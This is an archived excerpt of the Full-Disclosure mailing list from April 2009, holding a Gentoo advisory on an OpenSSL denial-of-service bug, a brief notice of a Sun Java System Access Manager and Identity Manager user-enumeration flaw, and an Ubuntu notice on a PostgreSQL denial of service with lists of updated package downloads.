Size: 836 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090407/e69dc867/attachment.bin 

From rbu at gentoo.org  Tue Apr  7 11:19:17 2009
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 7 Apr 2009 12:19:17 +0200
Subject: [Full-disclosure] [ GLSA 200904-08 ] OpenSSL: Denial of Service
Message-ID: <200904071219.22907.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200904-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OpenSSL: Denial of Service
      Date: April 07, 2009
      Bugs: #263751
        ID: 200904-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An error in OpenSSL might allow for a Denial of Service when printing
certificate details.

Background
==========

OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer
(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general
purpose cryptography library.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  dev-libs/openssl      < 0.9.8k                          >= 0.9.8k

Description
===========

The ASN1_STRING_print_ex() function does not properly check the
provided length of a BMPString or UniversalString, leading to an
invalid memory access.

Impact
======

A remote attacker could entice a user or automated system to print a
specially crafted certificate, possibly leading to a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenSSL users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8k"

References
==========

  [ 1 ] CVE-2009-0590
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 836 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090407/d62ed1e4/attachment.bin 

From marco.mella at aboutsecurity.net  Tue Apr  7 13:51:00 2009
From: marco.mella at aboutsecurity.net (Marco Mella)
Date: Tue, 7 Apr 2009 14:51:00 +0200
Subject: [Full-disclosure] POC - Sun Java System Acccess Manager & Identity
	Manager Users Enumeration
Message-ID: <cf7ad8210904070551j46711af5m83c78d6c7861fa18@mail.gmail.com>

============================================================
 Sun Java System Acccess Manager & Identity Manager Users Enumeration
============================================================

 Affected Software: Sun Java System Access Server, OpenSSo
                               Sun Java System Identity Manager

 Author: Marco Mella - marco[ dot ]mella[at]aboutsecurity[dot]net
 More information, Advisory and POC URL: http://www.aboutsecurity.net

Sun Java System Identity Manager Security Vulnerabilities
    Sun Java System Identity Manager 7.0
    Sun Java System Identity Manager 7.1
    Sun Java System Identity Manager 7.1.1
    Sun Java System Identity Manager 8.0
 Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-253267-1

Sun Java System Identity Manager
    Sun Java System Access Manager 6 2005Q1 (6.3)
    Sun Java System Access Manager 7 2005Q4 (7.0)
    Sun Java System Access Manager 7.1
 Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-242026-1

 [Summary]

 A Security Vulnerability in Sun Java System Access Manager and Identity
Manager allow a Remote Unprivileged User to Determine the existence of
"guessed" UserID  facilitating brute-force attacks.


[Proof of Concept]
Simple POC for users enumeration on Access Manager and Identity Manager
available on http://www.aboutsecurity.net



From marc.deslauriers at canonical.com  Tue Apr  7 16:43:17 2009
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Tue, 07 Apr 2009 11:43:17 -0400
Subject: [Full-disclosure] [USN-753-1] PostgreSQL vulnerability
Message-ID: <1239118997.5645.37.camel@mdlinux.technorage.com>

===========================================================
Ubuntu Security Notice USN-753-1             April 07, 2009
postgresql-8.1, postgresql-8.3 vulnerability
CVE-2009-0922
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  postgresql-8.1                  8.1.17-0ubuntu0.6.06.1

Ubuntu 8.04 LTS:
  postgresql-8.3                  8.3.7-0ubuntu8.04.1

Ubuntu 8.10:
  postgresql-8.3                  8.3.7-0ubuntu8.10.1

This update uses a new upstream release, which includes additional
bug fixes. In general, a standard system upgrade is sufficient to
effect the necessary changes.

Details follow:

It was discovered that PostgreSQL did not properly handle encoding
conversion failures. An attacker could exploit this by sending specially
crafted requests to PostgreSQL, leading to a denial of service.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.17-0ubuntu0.6.06.1.diff.gz
      Size/MD5:    31228 71bccf2bc3a9d691fa188f17256be796
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.17-0ubuntu0.6.06.1.dsc
      Size/MD5:     1134 27ed81130c485b3d35ac4e41c1125f83
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.17.orig.tar.gz
      Size/MD5: 11476782 0cb0becc0742b0560ae560e247a61297

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-doc-8.1_8.1.17-0ubuntu0.6.06.1_all.deb
      Size/MD5:  1510090 3c70135edbb89f5b1fd5b95b20331582

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   182848 45e99ca93914aeef4f55503a181ab9c6
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   374930 d3edfe3fb3d1c1fc34981980e0e42113
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   203862 ee00d25f970cccb1d4a1fef4aaf8c9cc
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   204808 f87d6e9fea0eb2cb421d89a8c43ad705
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   338742 90bb10f7ac1f603f1155e1bdd02c80ff
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   236698 037356b6c205f949afc6b33ca8e589d9
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:  3181004 9af6957744b7691cf233b5e177bafd15
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   812966 3269705fb1a0f6a2e58a5bf88eb5e8f3
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   645760 31dc149f9d3d4bd2954c8e69cabb654b
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   199708 2f9874cbf2a0f9f867d36a25e436ead6
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   193712 ffc8ac50c1b4e41c9ef150df318d6466
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   193848 0f0efbfc8b8bec11b922eb97b990ef31
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.17-0ubuntu0.6.06.1_amd64.deb
      Size/MD5:   629244 e032173db63d451a15f5d9521108234f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   181794 db6377b40682f8d10a5ef7f5cacb911a
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   365256 dc654d40d08e8eb8889be4e2c94c1fb9
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   201602 71a4c2ce208b2878796537a1aba7f31a
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   202974 9fd582b36eaf2ad9be207ad686be3d97
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   327288 488195ff2c587ebb4dd4a5990c5210c4
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   229878 7de9e769c8207930bc51ef27374d8e19
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:  2983346 9ac7b8fbab26d72cccbd5975d9f9eeb7
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   740980 4ef12be5c8a1134bcc40f2e9a23c5937
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   599874 6dcb91994ae298a8a59bada04fd436fe
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   197930 187ff372ff39372c33fa00da58498a03
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   191056 f31a1090580b526d2fe703c967a24151
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   192448 15758e2c367ae0c1b690ceaea05bf415
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.17-0ubuntu0.6.06.1_i386.deb
      Size/MD5:   629234 6b11f8929ad0c04a34f67e61cf08e16f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   183604 44220d9a2000911b13675122a92058b7
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   370802 2406daec156db7b382d0610c445ae572
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   204552 f87ef3d87a0255bbf8fd1e7d1eb8068d
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   207082 081df5b6e4f7e026b6b77a5ab5def1bb
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   333282 60454f36f139e2a47035e4fd6563c2b4
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   233428 1adfea01aa7d6d89c3978bb651d4ccaf
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:  3472152 850369c328d6dbf701ae0ed17f1e55eb
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   813820 c4d4dfafbd4ce9758177a59c56cff026
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   661990 5e033be30047ba8c0b1d5a3d03731759
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   199520 17a33bc8ce0502baf85a7b420837c19c
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   193794 becb0abc44e3ec60d95a491a4ba6d02a
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   194780 54327a7d328480662f199e9d425446a0
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.17-0ubuntu0.6.06.1_powerpc.deb
      Size/MD5:   629252 a4f1150b0b1b59d35b10fc59603ae08e

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   181566 ceb14b8f8016bc4701ed30d533dc9083
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   362648 37e71d816d035c7f62c6cf56ca03b7c5
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   202146 e454932078294def02a40eb9196f64ee
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   202586 72ae6e02b77f494f8ee25e57e28c27f6
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   329362 b8ea47626aa9bd13d38c0f8602068f88
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   230076 f17098e9493728585c42ad9ee0a6193b
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:  3347900 5a4a6883f8366efbb36100b66cde2dd5
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   769312 4f74e8b4260e015c45456a94c338f486
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   620346 18e880f440fea99f63e74976dbac19fb
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   198050 4947a31c7def58d866b7a7bab4b9ac43
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   192188 ec055e006f8e426cd50683abb9306d75
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   192864 332cddab3c928d6739e182853758cb65
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.17-0ubuntu0.6.06.1_sparc.deb
      Size/MD5:   629260 b9ff33c3d5e236dd4207794cdd629a3c

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.04.1.diff.gz
      Size/MD5:    62136 cf1cc75ef5758f79ac9fb6c49ecfe0ea
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.04.1.dsc
      Size/MD5:     1307 97126cb7c1fe4b4098c7f0299500e01b
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7.orig.tar.gz
      Size/MD5: 13814173 850f5e17f2d0a8272214ed75da4befc7

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client_8.3.7-0ubuntu8.04.1_all.deb
      Size/MD5:   232652 3ae8820a1c0d0713b444543fe966a81d
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib_8.3.7-0ubuntu8.04.1_all.deb
      Size/MD5:   232544 7a49dddf690773af91f9580758174762
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.7-0ubuntu8.04.1_all.deb
      Size/MD5:  1960554 e31a603dd1cee6553fef7bcb0dc2b8ac
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-doc_8.3.7-0ubuntu8.04.1_all.deb
      Size/MD5:     3438 2ed93fbdad6d1d296f6169f9f25e1272
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql_8.3.7-0ubuntu8.04.1_all.deb
      Size/MD5:   232684 a557548406238f9a8e37fb6a7599a0ad

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:    11608 13e0eba69f5ed1f6d80d3727bd2ab272
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   221446 73afb55d3d8b28c353c16eed5fa22dac
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:    32394 4c547823e699ffdd815bb65232c5b908
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   261606 c430da6faa8a03c6c518ec20d56d5746
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   190010 da7edb6bccadc27bd7cc5bf71ecf621d
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   297384 986892f2d8fb4b756da284c7f266262f
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:  3739462 c6174986ddf39618ceb56e6ea5f3e8ef
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   734956 4f45057250f27b6bd3211ef97190854b
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   363432 e860519a93d67fa6fb7c5577d6d025eb
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   261852 efb5e607d626fbcd84aa3cf2abeb7df4
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   254168 b731e04451a5b03406b1b3fa5ea9347d
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   251648 462bb12954cc3321cee0084768ca0efc
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.04.1_amd64.deb
      Size/MD5:   798324 e081292d750e68a7e525d521fbd2be98

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:    10602 4e75a3e897170dd8e4cf08db25685eda
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   213440 e5682af87a2a53f4b5e730e94999365c
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:    31414 85b064a97eeb9d97b3f4dacaaffec372
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   261088 1fddef261bf5b7c984644473f1f9cf21
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   182226 f9b0f8be1900b8a8c76c2bbeaafa82eb
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   293024 87ae783339e3b430e6901e5bc9dd5aee
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:  3609726 488a3fde7fbf57713518eb0e76bc9adf
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   704286 53af65520b09c3a3904a3b05ee268926
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   328202 3c7a3d8dc080a78dab3ad1eacc38e9bf
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   259786 e8b3e1ec1e87f37363405721ab2244ab
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   251454 cfeb1b978b11949d16474d315bb4b060
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   250464 94ab189ea4fd162de7db1f0ec3523aa6
    http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.04.1_i386.deb
      Size/MD5:   796576 839e97cca97e4a4bd9f43b8e24a5a434

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:    10468 d5cbb98d1d2a67b46d0d288bc9c0d061
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   212054 819ec76557edf6babe18392ea36a00f3
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:    30860 a83e3af184519d657d845b2a115ff9bd
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   260712 6727bd22d5a69b67175aa4135ba63b9c
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   179422 2e497981e1f8eb83629083cc5dba2f3a
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   292120 47f4d928de484aa2761b14286ddcc317
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:  3596656 893f7e04408330c607902d42f68b7cfc
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   701666 18499510fdde96c0a0f75644950627e4
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   326556 c287f81d5d7b1483277fc89a8bc69750
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   260166 11aa247bb58660c8d526ce1b9e980fb2
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   251538 d7ca89734f6bbd32b24ad68e0ff01362
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   250538 a2a834ad989cc9e000bfd5f9f78a4991
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.04.1_lpia.deb
      Size/MD5:   796190 84093de736da91231df5270e72bd8841

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-compat3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:    11252 cc891e8f51213cf430f3d0975bcd4423
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg-dev_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   217118 4adb95e3304d28ee4be60f2fb3c49429
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libecpg6_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:    33978 63ae6bc5d9c4cfa2139ca11887c136c1
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpgtypes3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   264334 6b48dbee88b21fa23577b9e2635f3db4
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq-dev_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   189740 32a60df9038d62686fbc3ebae1849081
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/libpq5_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   296796 cba44ce853e8ee74141734cfd595943a
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-8.3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:  4092632 6582a34ed1d7526278edd9f634ee4165
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-client-8.3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   767386 d3522c9ab2552e446aa28cf8d6cf2e72
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   412564 531c3214384f863d0e61a1980b1be655
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   263626 247460291ad023ebb3ee643ce7839714
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   255716 7034d7805c422ca0f43447e2e0c854a7
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   253852 11fae0b6f98dcb47533c87260f1ec1b1
    http://ports.ubuntu.com/pool/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.7-0ubuntu8.04.1_powerpc.deb
      Size/MD5:   799058 3d91785cb53d0cc384c3d84883048528

